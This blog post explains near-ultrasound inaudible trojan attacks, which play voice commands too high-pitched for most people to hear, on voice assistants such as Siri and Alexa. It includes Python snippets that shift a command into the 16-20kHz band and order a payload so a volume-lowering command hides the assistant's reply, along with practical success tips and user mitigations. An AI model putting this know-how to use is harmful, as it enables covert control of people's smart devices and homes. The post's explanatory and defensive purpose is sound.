In 2023, researchers at the University of Texas at San Antonio and the University of Colorado Colorado Springs discovered a novel and dangerous type of attack that targeted voice assistants like Siri and Alexa. The attack, dubbed a ‘near-ultrasound inaudible trojan’ or NUIT for short, is fairly simple in concept, though the actual execution is tricky and inconsistent, which is probably why these attacks have not seen significant use (as far as I can tell). Nevertheless, they are a great example of how attackers can get creative and exploit unusual vulnerabilities in order to achieve their aims.
What Is a NUIT?
A near-ultrasound inaudible trojan (NUIT) is essentially a snippet of sound played at a higher-than-usual frequency, one that can be heard and understood by voice assistants (think Google Home, Siri, Alexa, Cortana, etc.) but not by humans. The sound used is typically a common instruction that can be issued to a voice assistant, for example “Siri, call 123456789” or “Alexa, play Trickster by Five New Old”. Because it is effectively a ‘normal command’ being ‘sneakily played’ to the voice assistant, it is a bit like a trojan, a piece of malware that masquerades as normal software in order to infiltrate a system. What’s interesting about a NUIT is that there are two variants: either the target device both plays and receives the NUIT, or one device plays the NUIT and a second device receives it. The two are similar in concept but present slightly different implementation challenges, which are discussed below.
So what about the ‘near-ultrasound’ and ‘inaudible’ parts of NUIT?
Firstly, what does ‘near-ultrasound’ mean? To answer that, we need to know what ‘ultrasound’ refers to: in physics, it means frequencies above 20kHz (extending some way into the GHz range). The frequency range that the researchers used was around 16kHz-20kHz, which is almost-but-not-quite in the range of ‘ultrasound’, hence the attack is a ‘near-ultrasound’ attack.
Now for the inaudible part. Typically, the ‘normal range’ of hearing for a human is 20Hz-20kHz, but this tends to worsen with age (and with prolonged exposure to loud sounds without adequate protection). According to Connect Hearing, most people in their twenties will only be able to hear frequencies up to 17kHz, and by the time they’re in their fifties, it will have dropped to just 12kHz. Ordinarily, this isn’t a huge issue, as most sounds we hear every day are in the sub-10kHz range. However, because a NUIT sits in the 16kHz-20kHz band, this degradation effectively puts a NUIT attack outside the range of what most people can hear, or at the very least, what most people can hear clearly. This is why it is an ‘inaudible’ trojan.
How are NUITs Made?
In principle, a NUIT seems like a fairly straightforward piece of malware. You take a voice command, re-pitch it into the near-ultrasound range and then play it to the target device.
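To make the ‘re-pitch’ step a little more concrete, below is a minimal sketch of one way to shift a recorded command up into the 16kHz-20kHz band using a single-sideband frequency shift. This is purely an illustration of the frequency-shifting idea, not the researchers’ actual pipeline or a working attack; the file names, the 18kHz shift and the assumption of a mono 44.1kHz WAV are all my own choices.

```python
# Minimal sketch: shift a recorded voice command up into the near-ultrasound band.
# Assumptions (not from the paper): a mono 44.1 kHz WAV called "command.wav"
# and an 18 kHz shift, which keeps the result inside the 16-20 kHz band.
import numpy as np
from scipy.io import wavfile
from scipy.signal import butter, hilbert, sosfilt

SHIFT_HZ = 18_000  # chosen so the shifted audio sits in the near-ultrasound range

rate, samples = wavfile.read("command.wav")            # recorded command clip
samples = samples.astype(np.float64)
samples /= max(np.max(np.abs(samples)), 1e-9)          # normalise to roughly [-1, 1]

# Band-limit the command so the shifted copy stays below the Nyquist frequency
# (3 kHz + 18 kHz = 21 kHz < 22.05 kHz for a 44.1 kHz file).
lowpass = butter(8, 3_000, btype="low", fs=rate, output="sos")
baseband = sosfilt(lowpass, samples)

# Single-sideband frequency shift: multiply the analytic signal by a complex
# carrier and keep the real part, moving the whole spectrum up by SHIFT_HZ.
t = np.arange(len(baseband)) / rate
shifted = np.real(hilbert(baseband) * np.exp(2j * np.pi * SHIFT_HZ * t))

wavfile.write("nuit_candidate.wav", rate, (shifted * 32767).astype(np.int16))
```

Whether a given speaker can actually play the result and a given microphone will pick it up and recognise it is exactly the hit-and-miss part described below.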
Now, there are a few things being glossed over here. Firstly, in the original paper (linked below), the researchers identified three major challenges:
- Making the NUIT work on standard, off-the-shelf speakers (which they call COTS, commercial off-the-shelf, speakers) and on most devices’ microphones. It turns out that some devices simply can’t play sound at that frequency, or their microphone won’t pick it up, and this was solved using “some complex sound-physics shenanigans”.
- For attacks where the NUIT is played and received on one device, the device tends to lower its speaker volume when receiving voice commands, which makes the rest of the NUIT too quiet to be picked up. To solve this, the researchers identified a window of time, called a “reaction time window”, in which a command could be issued before the speaker volume was reduced.
- The NUIT has to be inaudible. Not only do humans have to be unable to hear the command itself, but the subsequent response also has to be inaudible, or at least so subtle that it is likely to go unnoticed. The researchers noted that this was a problem tied to the system being used, rather than the physics behind it, and each attack was adapted to suit each system as appropriate. A common solution was to simply tell the device to reduce its speaker volume (a rough sketch of how such a payload might be ordered is given after this list).
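As a rough sketch of that last point, here is one way a payload could be ordered so that a volume-reduction command lands before the command whose spoken response needs to go unnoticed. The clip names, the 300ms gaps and the specific ordering are my own assumptions for illustration; the paper does not prescribe these values.

```python
# Sketch: assemble a candidate payload so the "lower the volume" instruction
# comes before the command whose spoken response should go unnoticed.
# Clip names, the 300 ms gaps and the ordering are illustrative assumptions;
# all clips are assumed to share the same sample rate.
import numpy as np
from scipy.io import wavfile

def load(path):
    rate, data = wavfile.read(path)
    return rate, data.astype(np.float64)

rate, wake = load("wake_word_shifted.wav")       # the wake phrase, already shifted up
_, quieten = load("set_volume_low_shifted.wav")  # keeps the assistant's reply inaudible
_, action = load("main_command_shifted.wav")     # the command actually being smuggled in

gap = np.zeros(int(0.3 * rate))                  # pauses so the assistant parses each command
payload = np.concatenate([wake, gap, quieten, gap, action])

payload /= max(np.max(np.abs(payload)), 1e-9)    # normalise before writing out
wavfile.write("nuit_payload.wav", rate, (payload * 32767).astype(np.int16))
```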
Furthermore, it was noted that the attack would sometimes simply fail against certain types of devices, and that it had different success rates with different languages. Combined with external factors such as background noise, this makes it a fairly hit-and-miss tactic overall, even though it is simple in theory. In my own testing, based on the research, there seem to be a multitude of factors that can affect a NUIT’s success, including but not limited to:
- Device’s physical model, OS and voice assistant being used
- Distance between the speaker and microphone
- Orientation of the speaker and microphone
- Audio compression and format, including the platform it is played through; for example, YouTube cuts off all sounds above 16kHz (a quick way to check for this is sketched after this list)
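On the compression and format point, one quick way to check whether a platform or codec has stripped the near-ultrasound content is to measure how much of the re-encoded file’s energy survives above 16kHz. The file name below is just a placeholder.

```python
# Sketch: check what fraction of a (possibly re-encoded) payload's energy
# still sits above 16 kHz. The file name is a placeholder.
import numpy as np
from scipy.io import wavfile

rate, data = wavfile.read("nuit_payload_reencoded.wav")
data = data.astype(np.float64)
if data.ndim > 1:                                  # fold stereo down to mono
    data = data.mean(axis=1)

spectrum = np.abs(np.fft.rfft(data)) ** 2          # power spectrum
freqs = np.fft.rfftfreq(len(data), d=1 / rate)

above_16k = spectrum[freqs >= 16_000].sum()
print(f"Energy above 16 kHz: {100 * above_16k / max(spectrum.sum(), 1e-12):.1f}%")
```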
In short, it takes a substantial amount of trial and error and micro-adjustments to get a NUIT to work successfully, even though the idea behind it is quite straightforward.
As an aside, I may in future put together a guide or project write-up on how to actually make a functional NUIT. Maybe.
What are the Potential Risks Posed by NUITs? Can Attacks with NUITs be Mitigated?
The simple answer to the first question is just ‘whatever you can get [voice assistant here] to do’. For example, Apple now has smart locks, which can be controlled by Siri. So, in theory, an attacker could break into someone’s house by issuing a NUIT which unlocks the front door, allowing them to enter. Other smart devices that could potentially be targeted include cars, lights or accessories (e.g. watches). The scope of risks presented by NUITs is effectively limited by the connectivity of the target’s home: the more things that can be voice-controlled, the more risks there are.
In terms of mitigation, the original paper highlighted a few potential tactics, though most of them depend on the devices’ specifications. The researchers also emphasise the need for ‘notifications’, i.e. some way of alerting the user that a voice command has been issued, as a method of mitigation. However, there are also some steps that users can take to defend against NUITs, such as:
- Disabling voice assistants entirely, or at least requiring some kind of physical interaction (e.g. touch) to activate
- Disabling devices’ microphones unless you are actively using them
- Keeping devices’ speakers at zero volume, unless they are being used (only effective against single-device NUIT attacks)
Conclusion
In short, a NUIT is a malicious snippet of sound that can be used to manipulate a voice assistant, either through the device the assistant is running on or via a second device. Although it does not appear to be a widespread attack, it does have significant security implications. However, it is fairly simple to prevent NUIT attacks: keep your voice assistants off unless you are using them.
Perhaps in the future, with the rising popularity of ‘smart devices’ and the growth of the IoT, we may see NUITs become a more common threat. In the meantime, however, it appears that they will simply remain an interesting example of how attackers can manipulate common technologies in novel and unusual ways.
If you are interested in getting a more in-depth understanding of NUITs, the researchers’ original paper can be found here and their website with some examples is here.
Banner image credit: Markus Spiske